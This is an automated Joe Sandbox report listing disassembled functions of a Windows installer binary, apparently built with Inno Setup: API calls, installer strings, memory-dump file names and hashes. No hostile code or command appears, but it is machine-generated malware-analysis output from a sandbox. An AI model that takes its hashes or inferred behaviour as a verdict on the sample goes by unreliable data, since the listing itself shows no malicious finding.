                                                              Function 0047A218 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 210registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047BB01,?,00000000,00000000,00000001,00000000,0047A4B5,?,00000000), ref: 0047A479
                                                              Strings
                                                              • Failed to parse "reg" constant, xrefs: 0047A480
                                                              • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 0047A2ED
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                              • API String ID: 3535843008-1938159461
                                                              • Opcode ID: 05ee6b3b67afee6859f894b9066335fb286a048b1f35c691c8bdca609618c678
                                                              • Instruction ID: 25f2a786541cb687838a6194ffc4a73185deb9e5551b5ad8c851c0bf1152322b
                                                              • Opcode Fuzzy Hash: 05ee6b3b67afee6859f894b9066335fb286a048b1f35c691c8bdca609618c678
                                                              • Instruction Fuzzy Hash: 22817274E00108AFCB10DF95D485ADEBBF9AF88344F50817AE814B7392D739AE05CB99
                                                              Function 0048358C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetForegroundWindow.USER32(00000000,00483716,?,00000000,00483757,?,?,?,?,00000000,00000000,00000000,?,0046BD99), ref: 004835C5
                                                              • SetActiveWindow.USER32(?,00000000,00483716,?,00000000,00483757,?,?,?,?,00000000,00000000,00000000,?,0046BD99), ref: 004835D7
                                                              Strings
                                                              • Will not restart Windows automatically., xrefs: 004836F6
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Window$ActiveForeground
                                                              • String ID: Will not restart Windows automatically.
                                                              • API String ID: 307657957-4169339592
                                                              • Opcode ID: ceb5e1da4dc76295146827fa9bc1951038eb8722099578625e3d3877b71a3664
                                                              • Instruction ID: 4bdce942002d158aae482430f0c171f92fa141a3e9c551c877f01fd154286bbb
                                                              • Opcode Fuzzy Hash: ceb5e1da4dc76295146827fa9bc1951038eb8722099578625e3d3877b71a3664
                                                              • Instruction Fuzzy Hash: 7F414870648240BFD321FF68DC92B6D3BE49718B09F6448B7E440573A2E37D9A059B1D
                                                              Function 004763AC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 105timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LocalFileTimeToFileTime.KERNEL32(?,?,?,00000000,00000000,004764DF,?,00000000,004764F0,?,00000000,00476539), ref: 004764B0
                                                              • SetFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,00000000,00000000,004764DF,?,00000000,004764F0,?,00000000,00476539), ref: 004764C4
                                                              Strings
                                                              • Extracting temporary file: , xrefs: 004763EC
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: FileTime$Local
                                                              • String ID: Extracting temporary file:
                                                              • API String ID: 791338737-4171118009
                                                              • Opcode ID: a80e35328548893b295efc7472ac722154afa94c34651c27e26e6e8334cb8313
                                                              • Instruction ID: 173659db1c42fed311bbc77dc24fc0b62308bfde4479aaaaa113f8cb774a82d8
                                                              • Opcode Fuzzy Hash: a80e35328548893b295efc7472ac722154afa94c34651c27e26e6e8334cb8313
                                                              • Instruction Fuzzy Hash: 9541B670E00649AFCB01DFA5C892AAFBBB9EB09704F51847AF814A7291D7789905CB58
                                                              Function 0046CC0C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Failed to proceed to next wizard page; showing wizard., xrefs: 0046CD38
                                                              • Failed to proceed to next wizard page; aborting., xrefs: 0046CD24
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                              • API String ID: 0-1974262853
                                                              • Opcode ID: 7a25e1645a33cbe6e929f5c7beb1038c0aed19b3e354743701339651447d5c4b
                                                              • Instruction ID: bcb3787111d781b294161d03010f6e791927551fc3c7e501f8e48cd77162cd73
                                                              • Opcode Fuzzy Hash: 7a25e1645a33cbe6e929f5c7beb1038c0aed19b3e354743701339651447d5c4b
                                                              • Instruction Fuzzy Hash: A531C430604204DFD711EB59D9C5BA977F5EB06304F5500BBF448AB392D7786E40CB49
                                                              Function 00478E98 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 86registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                              • RegCloseKey.ADVAPI32(?,00478F7E,?,?,00000001,00000000,00000000,00478F99), ref: 00478F67
                                                              Strings
                                                              • %s\%s_is1, xrefs: 00478F10
                                                              • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00478EF2
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseOpen
                                                              • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                              • API String ID: 47109696-1598650737
                                                              • Opcode ID: 4390143081fa1cbfc05a77ab89ffad6b83c856e6c2d55465ffb8b64579313e9f
                                                              • Instruction ID: 4b2a563bf9abf46f4fe3d7c32e0d4fce195dfbf5fea183d3e913b06dd9c9918d
                                                              • Opcode Fuzzy Hash: 4390143081fa1cbfc05a77ab89ffad6b83c856e6c2d55465ffb8b64579313e9f
                                                              • Instruction Fuzzy Hash: EC218070B44244AFDB11DBA9CC45A9EBBF9EB8D704F90847BE408E7381DB789D018B58
                                                              Function 00450168 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 004501FD
                                                              • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0045022E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ExecuteMessageSendShell
                                                              • String ID: open
                                                              • API String ID: 812272486-2758837156
                                                              • Opcode ID: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
                                                              • Instruction ID: 7f57506e0c07b49dd0b520b237e7736b759e9f4ed638734fb0c833ac5abbff07
                                                              • Opcode Fuzzy Hash: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
                                                              • Instruction Fuzzy Hash: A1216074E00204AFDB10DFA9C896B9EBBF8EB44705F1081BAB404E7292D678DE45CA59
                                                              Function 00455290 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ShellExecuteEx.SHELL32(0000003C), ref: 0045532C
                                                              • GetLastError.KERNEL32(0000003C,00000000,00455375,?,?,?), ref: 0045533D
                                                                • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: DirectoryErrorExecuteLastShellSystem
                                                              • String ID: <
                                                              • API String ID: 893404051-4251816714
                                                              • Opcode ID: be62181711fdad770c23067a055a605ead6c89444dc6de91f0ff3b7559ccb240
                                                              • Instruction ID: 92df0b2f1231c5c49ece4c570041ef31d6ed92e86db86b93cafb864a5026e18c
                                                              • Opcode Fuzzy Hash: be62181711fdad770c23067a055a605ead6c89444dc6de91f0ff3b7559ccb240
                                                              • Instruction Fuzzy Hash: 172167B0600609ABDB10EF65C8926AE7BE8AF44355F54403AFC44E7291D7789E49CB98
                                                              Function 00402584 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,)), ref: 004025C7
                                                              • RtlLeaveCriticalSection.KERNEL32(0049B420,0040263D), ref: 00402630
                                                                • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,02249ECC,00001CA0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,02249ECC,00001CA0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,02249ECC,00001CA0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,02249ECC,00001CA0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                              • String ID: )
                                                              • API String ID: 2227675388-1084416617
                                                              • Opcode ID: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
                                                              • Instruction ID: 77bd95ba853a3ee3b707a504883d316aad751082ca23ba06a0d8aa2ba3da16af
                                                              • Opcode Fuzzy Hash: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
                                                              • Instruction Fuzzy Hash: E11104317042046FEB15AB796F5962B6AD4D795758B24087FF404F33D2DABD8C02929C
                                                              Function 00496B2E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00496B69
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Window
                                                              • String ID: /INITPROCWND=$%x $@
                                                              • API String ID: 2353593579-4169826103
                                                              • Opcode ID: 065ab22c92abacbd348a857e8389b224364e1a84b4d72130b6d36c29b0d142f9
                                                              • Instruction ID: 88b10d18150c6b9811cea3f3864e76c9cf3cbfb68c265b437af87b1fefc14b87
                                                              • Opcode Fuzzy Hash: 065ab22c92abacbd348a857e8389b224364e1a84b4d72130b6d36c29b0d142f9
                                                              • Instruction Fuzzy Hash: A3117231A042489FDF01DBA4E855BAEBFE8EB49314F51847BE504E7292EB3CA905C658
                                                              Function 00447414 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                              • SysFreeString.OLEAUT32(?), ref: 004474C6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: String$AllocByteCharFreeMultiWide
                                                              • String ID: NIL Interface Exception$Unknown Method
                                                              • API String ID: 3952431833-1023667238
                                                              • Opcode ID: eaaa5532a95bbaa63f0b72a9291e33775e11d622c6162567185e6fee38e986d8
                                                              • Instruction ID: eb0132878ffe7144b3db707554455947565e11d0cdd4dc78092451a8fec87e99
                                                              • Opcode Fuzzy Hash: eaaa5532a95bbaa63f0b72a9291e33775e11d622c6162567185e6fee38e986d8
                                                              • Instruction Fuzzy Hash: 8011B9706082089FEB10DFA58C52A6EBBBCEB09704F91407AF504F7681D77C9D01CB69
                                                              Function 004963A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000,00496443), ref: 0049640E
                                                              • CloseHandle.KERNEL32(004964A8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000), ref: 00496425
                                                                • Part of subcall function 004962F8: GetLastError.KERNEL32(00000000,00496390,?,?,?,?), ref: 0049631C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateErrorHandleLastProcess
                                                              • String ID: 0nI
                                                              • API String ID: 3798668922-794067871
                                                              • Opcode ID: 9f8f3e3bd8d813766f30c87d8e8bb38219208be6823d56de1360ae23e0f090d4
                                                              • Instruction ID: 4379268ebcebee96409867e54b2437a6ba0b21f89d1dc4ba20584320bf55fb87
                                                              • Opcode Fuzzy Hash: 9f8f3e3bd8d813766f30c87d8e8bb38219208be6823d56de1360ae23e0f090d4
                                                              • Instruction Fuzzy Hash: 840182B1644248AFDB00EBD1DC42A9EBBACDF08704F51403AB904E7281D6785E008A2D
                                                              Function 0042DD64 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DD78
                                                              • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DDB8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Value$EnumQuery
                                                              • String ID: Inno Setup: No Icons
                                                              • API String ID: 1576479698-2016326496
                                                              • Opcode ID: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                              • Instruction ID: 8d080c6700cf8453afd411d185ff7d2dd707f59376968ad674d2e7d16536e1ed
                                                              • Opcode Fuzzy Hash: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                              • Instruction Fuzzy Hash: 1B012B33B55B7179FB3045256D01F7B57889B82B60F64013BF942EA2C0D6999C04936E
                                                              Function 00452E88 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFileAttributesA.KERNEL32(00000000,?,00000000,00452EE9,?,?,-00000001,?), ref: 00452EC3
                                                              • GetLastError.KERNEL32(00000000,?,00000000,00452EE9,?,?,-00000001,?), ref: 00452ECB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AttributesErrorFileLast
                                                              • String ID: T$H
                                                              • API String ID: 1799206407-488339322
                                                              • Opcode ID: 164a1123582fd7f8b9629d9128a54c78742dfc935cb603b92947040143095295
                                                              • Instruction ID: d2ab7b9b66ca24062e77e49c95e81f13ab46b8af1b1b2eb811bbb53637dcbd2b
                                                              • Opcode Fuzzy Hash: 164a1123582fd7f8b9629d9128a54c78742dfc935cb603b92947040143095295
                                                              • Instruction Fuzzy Hash: 86F0F971A04204AB8B01DB7A9D4249EB7ECEB8A32171045BBFC04E3642E7B84E048558
                                                              Function 00452908 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DeleteFileA.KERNEL32(00000000,00000000,00452965,?,-00000001,?), ref: 0045293F
                                                              • GetLastError.KERNEL32(00000000,00000000,00452965,?,-00000001,?), ref: 00452947
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: DeleteErrorFileLast
                                                              • String ID: T$H
                                                              • API String ID: 2018770650-488339322
                                                              • Opcode ID: 54a576a396afaa571a066345412aacc20c83a6c328a38e41dddb38150347ef46
                                                              • Instruction ID: a1d21d86fbcf93c7076efe682877c1f84c37cf58088428800e153654eea74c02
                                                              • Opcode Fuzzy Hash: 54a576a396afaa571a066345412aacc20c83a6c328a38e41dddb38150347ef46
                                                              • Instruction Fuzzy Hash: 05F0C2B2B04608ABDB01EFB59D414AEB7E8EB4E315B6045B7FC04E3742E6B85E148598
                                                              Function 00452E10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RemoveDirectoryA.KERNEL32(00000000,00000000,00452E6D,?,-00000001,00000000), ref: 00452E47
                                                              • GetLastError.KERNEL32(00000000,00000000,00452E6D,?,-00000001,00000000), ref: 00452E4F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: DirectoryErrorLastRemove
                                                              • String ID: T$H
                                                              • API String ID: 377330604-488339322
                                                              • Opcode ID: f20199e737e539a63e7b44ed2747663bd9db8366f39d7150388d1a26e91210d5
                                                              • Instruction ID: a8b2bafe79397aca91686f8656b478e2385adfe3b855dfce5f6cc0b9ba314abc
                                                              • Opcode Fuzzy Hash: f20199e737e539a63e7b44ed2747663bd9db8366f39d7150388d1a26e91210d5
                                                              • Instruction Fuzzy Hash: 70F0FC71A04708AFCF01EF759D4249EB7E8DB4E31575049B7FC14E3642E7785E048598
                                                              Function 00498004 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0047D0CC: FreeLibrary.KERNEL32(73AF0000,00481A2F), ref: 0047D0E2
                                                                • Part of subcall function 0047CD9C: GetTickCount.KERNEL32 ref: 0047CDE6
                                                                • Part of subcall function 00457294: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004572B3
                                                              • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,0049895B), ref: 00498059
                                                              • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,0049895B), ref: 0049805F
                                                              Strings
                                                              • Detected restart. Removing temporary directory., xrefs: 00498013
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
